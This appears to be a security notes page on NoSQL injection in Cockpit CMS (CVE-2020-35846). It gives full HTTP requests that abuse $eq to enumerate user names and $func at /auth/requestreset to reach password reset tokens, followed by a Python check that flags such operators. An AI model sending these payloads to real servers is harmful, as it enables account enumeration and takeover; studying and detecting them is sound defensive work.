Default credentials

Vulnerability

Source: https://swarm.ptsecurity.com/rce-cockpit-cms/

Extracting password reset tokens

Cockpit, like many other web applications, allows resetting account passwords.
We discovered two methods that are vulnerable to NoSQL injection and allow obtaining the password reset token for any user.

NoSQL injection in /auth/check (CVE-2020-35846)

Using the $eq operator

The $eq operator matches documents where the value of a field equals the specified value.

For example, you can use it to brute-force user names with a dictionary.

The condition is met: a user with the name admin has been found

```http
POST /auth/check HTTP/1.1
Host: 192.168.199.10:9090
Content-Type: application/json; charset=UTF-8
Content-Length: 49
Origin: http://192.168.199.10:9090

{"auth":{"user":{"$eq":"admin"},"password":[0]} }
```

The condition is NOT met: no user with the name admin1 has been found

```http
POST /auth/check HTTP/1.1
Host: 192.168.199.10:9090
Content-Type: application/json; charset=UTF-8
Content-Length: 49
Origin: http://192.168.199.10:9090

{"auth":{"user":{"$eq":"admin1"},"password":[0]} }
```

NoSQL injection in /auth/requestreset

The [requestreset](https://github.com/agentejo/cockpit/blob/0.11.1/modules/Cockpit/Controller/Auth.php#L82) method of the Auth controller is responsible for creating the password reset token. The request below passes a `$func` operator in the `user` field instead of a plain string:

```http
POST /auth/requestreset HTTP/1.1
Host: 192.168.199.10:9090
Content-Type: application/json; charset=UTF-8
Content-Length: 29
Origin: http://192.168.199.10:9090

{"user":{"$func":"var_dump"} }
```
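As an added example (not code from the Cockpit project or from the original write-up), the following Python check covers both request shapes above: it parses the JSON body sent to /auth/check or /auth/requestreset, requires the user and password fields to be plain strings, and reports any `$`-prefixed query operator such as `$eq` or `$func` nested inside them. The mapping from endpoint to expected string fields is an assumption made for illustration.

```python
import json
from typing import Any

# Fields each endpoint must receive as plain strings (paths from the requests
# above; the field mapping itself is an assumption for this example).
EXPECTED_SCALARS = {
    "/auth/check": ("auth.user", "auth.password"),
    "/auth/requestreset": ("user",),
}

def _lookup(body: Any, dotted: str) -> Any:
    """Follow a dotted path ("auth.user") into a parsed body; None if absent."""
    cur = body
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur

def find_operator_keys(value: Any) -> list[str]:
    """Collect every '$'-prefixed key nested anywhere in a JSON value."""
    found: list[str] = []
    if isinstance(value, dict):
        for key, sub in value.items():
            if isinstance(key, str) and key.startswith("$"):
                found.append(key)
            found.extend(find_operator_keys(sub))
    elif isinstance(value, list):
        for item in value:
            found.extend(find_operator_keys(item))
    return found

def audit_request(path: str, raw_body: str) -> list[str]:
    """Return findings for one request body; an empty list means well-formed."""
    try:
        body = json.loads(raw_body)
    except ValueError:
        return ["body is not valid JSON"]
    findings: list[str] = []
    for field in EXPECTED_SCALARS.get(path, ()):
        value = _lookup(body, field)
        if value is None:
            continue
        if not isinstance(value, str):
            findings.append(f"{field} must be a string, got {type(value).__name__}")
        for op in find_operator_keys(value):
            findings.append(f"{field} carries query operator {op}")
    return findings
```

Run against the two payloads above, the check reports the non-string `user` field together with the `$eq` or `$func` operator it carries, while a body with plain string credentials returns no findings.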

Last update: 2026-03-07
Created: March 7, 2026 21:02:17